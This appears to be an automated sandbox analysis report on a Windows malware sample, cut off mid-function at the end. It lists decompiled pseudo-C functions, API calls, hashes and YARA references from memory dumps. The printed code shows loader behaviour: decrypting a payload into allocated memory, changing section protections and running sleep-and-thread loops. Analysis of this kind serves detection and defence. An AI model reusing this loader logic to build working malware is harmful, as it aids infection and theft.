0x044b69c3
0x044b69c4
0x044b69cc
0x044b69cc
0x044b686c
0x044b6874
0x044b69b5
0x044b69b6
0x044b69ba
0x00000000
0x044b69ba
0x044b6887
0x044b6889
0x044b6889
0x044b6895
0x044b689a
0x044b68a0
0x044b69a3
0x00000000
0x044b68a6
0x044b68a6
0x044b68ab
0x044b68b4
0x044b68b9
0x044b68c2
0x044b68e9
0x044b68c4
0x044b68de
0x044b68e0
0x044b68e0
0x044b68ec
0x044b6996
0x044b699a
0x044b69a4
0x044b69a4
0x044b69aa
0x044b69ac
0x044b69ac
0x00000000
0x044b68f2
0x044b68f9
0x044b693e
0x044b6951
0x044b696a
0x044b696e
0x044b6974
0x044b697c
0x044b698b
0x044b698b
0x044b6991
0x00000000
0x044b6991
0x044b68fb
0x044b6900
0x044b6909
0x044b690e
0x044b6912
0x044b6939
0x044b6914
0x044b6924
0x044b692e
0x044b6930
0x044b6930
0x044b693c
0x00000000
0x00000000
0x00000000
0x00000000
0x044b693c
0x044b68ec

APIs

memset.NTDLL ref: 044B682A

Part of subcall function 044B90A5: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,044B6852,00410025,00000005,?,00000000), ref: 044B90B6
Part of subcall function 044B90A5: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 044B90D3

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044B6861
StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,044B2042), ref: 044B686C

Strings

Clie, xrefs: 044B6924

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID: Clie
API String ID: 3817122888-1624203186
Opcode ID: 1a9bf28c5ffcfea27b1fe964575bc7ca77dcfd351a413d9017c89a4d47a884ec
Instruction ID: f042c6e1d87421a88f35d8e35e175e56c0f7bd27381e995ef1f7d153e9ffc01c
Opcode Fuzzy Hash: 1a9bf28c5ffcfea27b1fe964575bc7ca77dcfd351a413d9017c89a4d47a884ec
Instruction Fuzzy Hash: 2B418FB2604705AFEF10AEA5D98099BB7ECEF84618F01492FF9C497111D671E9058BE2

Uniqueness

Uniqueness Score: -1.00%

Function 044B56F9, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 044B5756
SysAllocString.OLEAUT32(044B8CCC), ref: 044B579A
SysFreeString.OLEAUT32(00000000), ref: 044B57AE
SysFreeString.OLEAUT32(00000000), ref: 044B57BC

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0e9cf6f1dc580c15f8a3674e71fb5fd49b43d7a304a35be131552c59d4016e43
Instruction ID: 1c7b411a6ec9010e972180bea840fa935de42545417b05c75370da52d498a8d8
Opcode Fuzzy Hash: 0e9cf6f1dc580c15f8a3674e71fb5fd49b43d7a304a35be131552c59d4016e43
Instruction Fuzzy Hash: 7931D975A00249FFDF05DF98D4D08EEBBB9EF48304F20842EE9469B251D735A941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401B04, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00401B04(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed int _t61;
				intOrPtr _t78;
				void* _t79;

				_t78 =  *0x404130;
				_t42 = E00401652(_t78,  &_v24,  &_v16);
				_v20 = _t42;
				if(_t42 == 0) {
					asm("sbb ebx, ebx");
					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t79 = _t78 + _v24;
					_v40 = _t79;
					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
					_v28 = _t49;
					if(_t49 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t61 <= 0) {
							_t50 =  *0x404140;
						} else {
							_t53 = _t49 - _t79;
							_v32 = _t53;
							_v36 = _t53 + _a4 + 0x4051a2;
							_v12 = _t79;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("rol edx, cl");
								E00401E27(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								_v12 = _v12 + 0x1000;
								 *0x404140 = _t50;
								if(_v8 >= _t61) {
									break;
								}
								_t53 = _v32;
							}
						}
						if(_t50 != 0x59935a40) {
							_v20 = 0xc;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x00401b0b
0x00401b1b
0x00401b20
0x00401b25
0x00401b3a
0x00401b41
0x00401b46
0x00401b57
0x00401b5a
0x00401b60
0x00401b65
0x00401c0f
0x00401b6b
0x00401b6b
0x00401b71
0x00401bd7
0x00401b73
0x00401b76
0x00401b80
0x00401b83
0x00401b86
0x00401b8e
0x00401b99
0x00401b9a
0x00401b9b
0x00401baa
0x00401bb3
0x00401bbd
0x00401bc0
0x00401bc3
0x00401bca
0x00401bd2
0x00000000
0x00000000
0x00401b8b
0x00401b8b
0x00401bd4
0x00401be1
0x00401bf6
0x00401be3
0x00401bec
0x00401bf1
0x00401c07
0x00401c07
0x00401c16
0x00401c1c

APIs

VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00401B5A
memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00401F42,-00000008), ref: 00401BEC
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00401C07

Strings

Nov 6 2020, xrefs: 00401B91

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Nov 6 2020
API String ID: 4010158826-3693430718
Opcode ID: 83f0a01c8cd153b421bd86b2505f724c3738bb5ded81c2935836ba7c8f4357c0
Instruction ID: 90ee2352b47475fe5baf0e0990611eda72304af55510207f6fe4810007c49e5b
Opcode Fuzzy Hash: 83f0a01c8cd153b421bd86b2505f724c3738bb5ded81c2935836ba7c8f4357c0
Instruction Fuzzy Hash: 36315E71D00219ABDB01CF95D981BEEBBB9FF48304F104169E901BB290D775AA05CB98

Uniqueness

Uniqueness Score: -1.00%

Function 044B38B1, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E044B38B1(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E044B6D10(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x044b38bd
0x044b38c1
0x044b38c2
0x044b38c3
0x044b38c5
0x044b38c7
0x044b38ca
0x044b38cf
0x044b3966
0x044b396d
0x044b396d
0x044b38d8
0x044b38df
0x044b38ef
0x044b38ef
0x044b38f5
0x044b38f7
0x044b38fc
0x044b3905
0x044b390b
0x044b3910
0x044b391b
0x044b391f
0x044b3921
0x044b3922
0x044b392b
0x044b392f
0x044b3940
0x044b3931
0x044b3936
0x044b393b
0x044b394a
0x044b394a
0x044b391f
0x044b3950
0x044b3956
0x044b3956
0x044b395f
0x044b3964
0x044b3964
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 044B38DF
lstrlenW.KERNEL32(?), ref: 044B3915
memcpy.NTDLL(00000000,?,?,?), ref: 044B3936
SysFreeString.OLEAUT32(?), ref: 044B394A

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 44b2338aab4ad7f5b2a0624de10b75cb53b8ffb20eb959d2b0ebbd6f3a52af04
Instruction ID: fef3020cc7e71170e39683dabf18fad65426a4b91d29d682fa24f93a8d8fd664
Opcode Fuzzy Hash: 44b2338aab4ad7f5b2a0624de10b75cb53b8ffb20eb959d2b0ebbd6f3a52af04
Instruction Fuzzy Hash: 21213375901609EFDF11DFA9C4849DEBBB4FF49314B10456AE945E7300E730EA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B567B, Relevance: 6.0, APIs: 4, Instructions: 38
sleepmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B567B(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _t5;
				void* _t7;
				void* _t10;
				void* _t13;
				void* _t14;
				void* _t15;
				signed int _t16;
				signed int _t22;

				_t16 = __edx;
				_t5 = HeapCreate(0, 0x400000, 0); // executed
				 *0x44bd238 = _t5;
				if(_t5 == 0) {
					_t14 = 8;
					return _t14;
				}
				 *0x44bd1a8 = GetTickCount();
				_t7 = E044B3B0B(_a4);
				if(_t7 == 0) {
					do {
						_t22 = SwitchToThread() + 8;
						_t10 = E044B5CDC(_a4, _t22);
						Sleep(0x20 + _t22 * 4); // executed
					} while (_t10 == 1);
					if(E044B6BF1(_t15) != 0) {
						 *0x44bd260 = 1; // executed
					}
					_t13 = E044B1E95(_t16); // executed
					return _t13;
				}
				return _t7;
			}

0x044b567b
0x044b5684
0x044b568a
0x044b5691
0x044b5695
0x00000000
0x044b5695
0x044b56a2
0x044b56a7
0x044b56ae
0x044b56b2
0x044b56be
0x044b56c2
0x044b56d1
0x044b56d7
0x044b56e5
0x044b56e7
0x044b56e7
0x044b56f1
0x00000000
0x044b56f1
0x044b56f6

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,044B220C,?), ref: 044B5684
GetTickCount.KERNEL32 ref: 044B5698
SwitchToThread.KERNEL32(?,00000001,?), ref: 044B56B2
Sleep.KERNELBASE(00000000,-00000008,?,00000001,?), ref: 044B56D1

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: CountCreateHeapSleepSwitchThreadTick
String ID:
API String ID: 377297877-0
Opcode ID: 85ba2e10049b08288e60a3785d89e330aa0468249b5063e02bb280ee0036195d
Instruction ID: d6b71499816ad8ce73e982c4fff0f5336d815d0830583c785396c4b9daecd93c
Opcode Fuzzy Hash: 85ba2e10049b08288e60a3785d89e330aa0468249b5063e02bb280ee0036195d
Instruction Fuzzy Hash: 80F068719403116BFB106FB59C88B9BB6A4EF543D9F10042BE989D6241DB78E8418AF5

Uniqueness

Uniqueness Score: -1.00%

Function 044B6A7F, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6A7F() {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t51;

				_v12 = 0;
				_t23 = E044B3A8E(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x44bd2a4; // 0x8ca5a8
				_t4 = _t24 + 0x44bedb0; // 0x4d89358
				_t5 = _t24 + 0x44bed58; // 0x4f0053
				_t26 = E044B46B8( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x44bd2a4; // 0x8ca5a8
						_t11 = _t32 + 0x44beda4; // 0x4d8934c
						_t48 = _t11;
						_t12 = _t32 + 0x44bed58; // 0x4f0053
						_t51 = E044B241A(_t11, _t12, _t11);
						_t58 = _t51;
						if(_t51 != 0) {
							_t35 =  *0x44bd2a4; // 0x8ca5a8
							_t13 = _t35 + 0x44bedee; // 0x30314549
							_t37 = E044B3695(_t48, _t58, _v8, _t51, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t60 =  *0x44bd25c - 6;
								if( *0x44bd25c <= 6) {
									_t42 =  *0x44bd2a4; // 0x8ca5a8
									_t15 = _t42 + 0x44bec0a; // 0x52384549
									E044B3695(_t48, _t60, _v8, _t51, _t15, 0x13);
								}
							}
							_t38 =  *0x44bd2a4; // 0x8ca5a8
							_t17 = _t38 + 0x44bede8; // 0x4d89390
							_t18 = _t38 + 0x44bedc0; // 0x680043
							_t45 = E044B407F(_v8, 0x80000001, _t51, _t18, _t17);
							HeapFree( *0x44bd238, 0, _t51);
						}
					}
					HeapFree( *0x44bd238, 0, _v16);
				}
				_t53 = _v8;
				if(_v8 != 0) {
					E044B3B83(_t53);
				}
				return _t45;
			}

0x044b6a8f
0x044b6a92
0x044b6a99
0x044b6a9b
0x044b6a9b
0x044b6a9e
0x044b6aa3
0x044b6aaa
0x044b6ab7
0x044b6abc
0x044b6ac0
0x044b6ace
0x044b6adc
0x044b6ae0
0x044b6b71
0x044b6b71
0x044b6ae6
0x044b6ae6
0x044b6aeb
0x044b6aeb
0x044b6af2
0x044b6afe
0x044b6b00
0x044b6b02
0x044b6b04
0x044b6b0b
0x044b6b16
0x044b6b1d
0x044b6b1f
0x044b6b26
0x044b6b28
0x044b6b2f
0x044b6b3a
0x044b6b3a
0x044b6b26
0x044b6b3f
0x044b6b44
0x044b6b4b
0x044b6b69
0x044b6b6b
0x044b6b6b
0x044b6b02
0x044b6b7d
0x044b6b7d
0x044b6b7f
0x044b6b84
0x044b6b86
0x044b6b86
0x044b6b91

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D89358,00000000,?,7519F710,00000000,7519F730), ref: 044B6ACE
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D89390,?,00000000,30314549,00000014,004F0053,04D8934C), ref: 044B6B6B
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B61D1), ref: 044B6B7D

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e05c5d618d50a5a3ffbf739a98074f64f07ffde57d401caf7b45ce6b03a82772
Instruction ID: 3a23d3f7c9b5287a118d7ad609a3b7aac2bf731818fb232d1ac1dca81bb0ae2e
Opcode Fuzzy Hash: e05c5d618d50a5a3ffbf739a98074f64f07ffde57d401caf7b45ce6b03a82772
Instruction Fuzzy Hash: 0931B071A00159AFEF10AFE5CC84EDABBBDEF48704F1100AAB5489B111D670EE15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B5B7A, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E044B5B7A(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t19;
				void* _t25;
				void* _t26;
				void* _t31;
				void* _t37;
				void* _t41;
				intOrPtr _t43;
				void* _t44;

				_t37 = __edx;
				_t43 =  *0x44bd2a4; // 0x8ca5a8
				_push(0x800);
				_push(0);
				_push( *0x44bd238);
				_t1 = _t43 + 0x44be791; // 0x6976612e
				_t44 = _t1;
				if( *0x44bd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t31 = 8;
						L7:
						if(_t31 != 0) {
							L10:
							 *0x44bd24c =  *0x44bd24c + 1;
							L11:
							return _t31;
						}
						_t46 = _a4;
						_t41 = _v8;
						 *_a16 = _a4;
						 *_a20 = E044B3769(_a4, _t41); // executed
						_t19 = E044B8779(_t41, _t41, _t46); // executed
						if(_t19 != 0) {
							 *_a8 = _t41;
							 *_a12 = _t19;
							if( *0x44bd24c < 5) {
								 *0x44bd24c =  *0x44bd24c & 0x00000000;
							}
							goto L11;
						}
						_t31 = 0xbf;
						E044B5225();
						RtlFreeHeap( *0x44bd238, 0, _t41); // executed
						goto L10;
					}
					_t25 = E044B87B0(_a4, _t37, _t44,  &_v8,  &_a4, _t14);
					L5:
					_t31 = _t25;
					goto L7;
				}
				_t26 = RtlAllocateHeap(); // executed
				if(_t26 == 0) {
					goto L6;
				}
				_t25 = E044B1000(_a4, _t37, _t44,  &_v8,  &_a4, _t26); // executed
				goto L5;
			}

0x044b5b7a
0x044b5b88
0x044b5b8f
0x044b5b94
0x044b5b96
0x044b5b9c
0x044b5b9c
0x044b5ba2
0x044b5bca
0x044b5be2
0x044b5be4
0x044b5be5
0x044b5be7
0x044b5c25
0x044b5c25
0x044b5c2b
0x044b5c31
0x044b5c31
0x044b5be9
0x044b5bef
0x044b5bf2
0x044b5c01
0x044b5c03
0x044b5c0a
0x044b5c3e
0x044b5c43
0x044b5c45
0x044b5c47
0x044b5c47
0x00000000
0x044b5c45
0x044b5c0c
0x044b5c11
0x044b5c1f
0x00000000
0x044b5c1f
0x044b5bd9
0x044b5bde
0x044b5bde
0x00000000
0x044b5bde
0x044b5ba4
0x044b5bac
0x00000000
0x00000000
0x044b5bbb
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 044B5BA4

Part of subcall function 044B1000: GetTickCount.KERNEL32 ref: 044B101A
Part of subcall function 044B1000: wsprintfA.USER32 ref: 044B1065
Part of subcall function 044B1000: wsprintfA.USER32 ref: 044B1084
Part of subcall function 044B1000: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 044B10B5
Part of subcall function 044B1000: GetTickCount.KERNEL32 ref: 044B10C6
Part of subcall function 044B1000: RtlEnterCriticalSection.NTDLL(04D89570), ref: 044B10D6
Part of subcall function 044B1000: RtlLeaveCriticalSection.NTDLL(04D89570), ref: 044B10F4
Part of subcall function 044B1000: StrTrimA.SHLWAPI(00000000,044BC294,?,04D895B0), ref: 044B112B

RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 044B5BC2
RtlFreeHeap.NTDLL(00000000,?,?,?,044B6223,00000002,?,?,?,?), ref: 044B5C1F

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Allocate$CountCriticalSectionTickwsprintf$EnterFreeLeaveTrim
String ID:
API String ID: 2048538155-0
Opcode ID: e54e2f1aacebcaa0b54ae57bc4de16ddfe7d8c5230bc81370afe4e98bd5a6c06
Instruction ID: 182764f95f6212b99455624a9b74d8dc6f26a190267ce9591b921b2ff7054083
Opcode Fuzzy Hash: e54e2f1aacebcaa0b54ae57bc4de16ddfe7d8c5230bc81370afe4e98bd5a6c06
Instruction Fuzzy Hash: 59214FB5600209FBEF159F69D884ADAB7ACEF48348F10445BFA419B240D674FD019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401338, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401338(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x00401342
0x00401347
0x00401353
0x00401360
0x00401366
0x00401368
0x0040136e
0x004013db
0x004013e2
0x004013e2
0x00401370
0x00401373
0x00401373
0x00401377
0x00000000
0x00000000
0x00401379
0x0040137d
0x00401395
0x00401399
0x004013ad
0x0040139b
0x0040139b
0x004013a1
0x004013a5
0x004013a5
0x0040137f
0x0040137f
0x0040138b
0x00401390
0x00401390
0x004013be
0x004013c2
0x004013ca
0x004013ca
0x004013cd
0x004013d0
0x004013d3
0x004013d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004013d9
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?), ref: 00401366
VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 004013BE
GetLastError.KERNEL32 ref: 004013C4

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: cca73f198c9bd0c2e52023da588143f873bc5867688da7c8d4189e7e789084c7
Instruction ID: 9a8d8a0e0298cef8495b12f641a733762c46a090bf3ac86039a952d1e4fb795e
Opcode Fuzzy Hash: cca73f198c9bd0c2e52023da588143f873bc5867688da7c8d4189e7e789084c7
Instruction Fuzzy Hash: 3C219372900209EFEB208F95CD80FBDB7F4FB14355F50446AE941B71A2D3789A85DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401280, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401280() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x404144;
				if( *0x40412c > 5) {
					_t16 = _t15 + 0x4050f4;
				} else {
					_t16 = _t15 + 0x4050b1;
				}
				E004017EF(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E004016AC( &_v32,  &_v16,  *0x404140 ^ 0xc786104c) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x404138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E00401006(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x404138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E00401151(_v28); // executed
				}
				ExitThread(_t25);
			}

0x00401286
0x00401297
0x004012a1
0x00401299
0x00401299
0x00401299
0x004012a8
0x004012b1
0x004012b6
0x004012d4
0x0040132f
0x004012d6
0x004012dc
0x004012e2
0x004012e2
0x004012f0
0x004012f4
0x004012fb
0x004012fd
0x00401301
0x00401303
0x0040130a
0x0040131e
0x0040130c
0x00401312
0x00401317
0x0040130a
0x00401326
0x00401326
0x00401331

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 004012DC
memcpy.NTDLL(?,?,00000002), ref: 00401312
ExitThread.KERNEL32 ref: 00401331

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: bcaa9450168cb150ff1deeee12787a43661eea3bf335652445aed5238e23b455
Instruction ID: 2f253662844504de928f555576aff55dc2a33047734e299e09dc8d41c2a764d3
Opcode Fuzzy Hash: bcaa9450168cb150ff1deeee12787a43661eea3bf335652445aed5238e23b455
Instruction Fuzzy Hash: 9C118EB1504201ABE710EB61DD48E9B77ECAB58304F04083BF645F71B1E638E5458B5A

Uniqueness

Uniqueness Score: -1.00%

Function 044B37B4, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E044B37B4(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E044B56F9(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
